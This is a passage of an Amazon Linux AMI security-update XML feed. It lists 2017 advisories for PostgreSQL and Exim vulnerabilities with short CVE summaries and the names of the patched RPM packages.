arch="x86_64"><filename>Packages/apr-util-pgsql-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-nss-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-debuginfo-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-freetds-1.5.4-6.18.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-openssl-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-ldap-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-sqlite-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-pgsql-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-odbc-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-debuginfo-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-devel-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-freetds-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-nss-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-mysql-1.5.4-6.18.amzn1.i686.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.18.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-1.5.4-6.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-930</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-930: medium priority package update for postgresql95 postgresql96</title><issued date="2017-12-05 22:18:00" /><updated date="2017-12-06 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15099:
INSERT ... ON CONFLICT DO UPDATE commands in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, and 9.5.x before 9.5.10 disclose table contents that the invoker lacks privilege to read. These exploits affect only tables where the attacker lacks full read access but has both INSERT and UPDATE privileges. Exploits bypass row level security policies and lack of SELECT privilege.
1508823:
CVE-2017-15099 postgresql: INSERT ... ON CONFLICT DO UPDATE fails to enforce SELECT privileges
CVE-2017-15098:
Invalid json_populate_recordset or jsonb_populate_recordset function calls in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, 9.5.x before 9.5.10, 9.4.x before 9.4.15, and 9.3.x before 9.3.20 can crash the server or disclose a few bytes of server memory.
1508820:
CVE-2017-15098 postgresql: Memory disclosure in JSON functions
CVE-2017-12172:
Privilege escalation flaws were found in the initialization scripts of PostgreSQL. A remote attacker with access to the postgres user account could use these flaws to obtain root access on the server machine.
1498394:
CVE-2017-12172 postgresql: Start scripts permit database administrator to modify root-owned files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12172" title="" id="CVE-2017-12172" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15098" title="" id="CVE-2017-15098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15099" title="" id="CVE-2017-15099" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-server" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.10" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.10-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.10" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.10-1.77.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.6" release="1.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.6-1.79.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.6-1.79.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.6" release="1.79.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.6-1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-931</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-931: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2017-12-05 22:19:00" /><updated date="2017-12-06 21:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15098:
Invalid json_populate_recordset or jsonb_populate_recordset function calls in PostgreSQL 10.x before 10.1, 9.6.x before 9.6.6, 9.5.x before 9.5.10, 9.4.x before 9.4.15, and 9.3.x before 9.3.20 can crash the server or disclose a few bytes of server memory.
1508820:
CVE-2017-15098 postgresql: Memory disclosure in JSON functions
CVE-2017-12172:
Privilege escalation flaws were found in the initialization scripts of PostgreSQL. A remote attacker with access to the postgres user account could use these flaws to obtain root access on the server machine.
1498394:
CVE-2017-12172 postgresql: Start scripts permit database administrator to modify root-owned files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12172" title="" id="CVE-2017-12172" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15098" title="" id="CVE-2017-15098" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-docs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.24-1.65.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.24" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.24-1.65.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.15-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.15" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.15-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.20" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.20-1.69.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.20-1.69.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.20" release="1.69.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.20-1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-932</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-932: critical priority package update for exim</title><issued date="2017-12-20 18:51:00" /><updated date="2017-12-21 22:55:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16944:
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a &#039;.&#039; character signifying the end of the content, related to the bdat_getc function.
1517684:
CVE-2017-16944 exim: infinite loop and stack exhaustion in receive_msg function via vectors involving BDAT commands
CVE-2017-16943:
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands.
1517680:
CVE-2017-16943 exim: use-after-free in receive_msg function via vectors involving BDAT commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16943" title="" id="CVE-2017-16943" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16944" title="" id="CVE-2017-16944" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-debuginfo" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.89" release="4.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.89-4.17.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.89" release="4.17.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.89-4.17.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.89" release="4.17.amzn1" epoch="0" 